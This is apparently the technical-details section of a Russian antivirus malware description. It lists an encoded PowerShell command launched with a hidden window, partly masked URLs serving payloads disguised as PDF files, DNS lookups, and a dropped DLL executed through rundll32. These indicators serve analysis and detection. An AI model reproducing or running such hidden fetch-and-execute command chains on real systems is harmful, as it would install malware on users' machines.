Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQANQBWAFQAMgBsAFIAPQAgACAAWwBUAFkAUABFAF0AKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBJAHIAZQBjAFQAbwAnACwAJwByAHkAJwAsACcAcwBZAHMAVABlAG0ALgBpAG8ALgAnACwAJw...
- %HOMEPATH%\zwejn61\pxs7xhx\fmdlmggi.dll
- http://pr#####studio.com.pl/mbuwc5p1.pdf
- http://po######o.angela-mathis.com/ohe5exr.pdf
- DNS ASK pr#####studio.com.pl
- DNS ASK po######o.angela-mathis.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQANQBWAFQAMgBsAFIAPQAgACAAWwBUAFkAUABFAF0AKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBJAHIAZQBjAFQAbwAnACwAJwByAHkAJwAsACcAcwBZAHMAVABlAG0ALgBpAG8ALgAnACwAJw...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Zwejn61\Pxs7xhx\Fmdlmggi.dll 0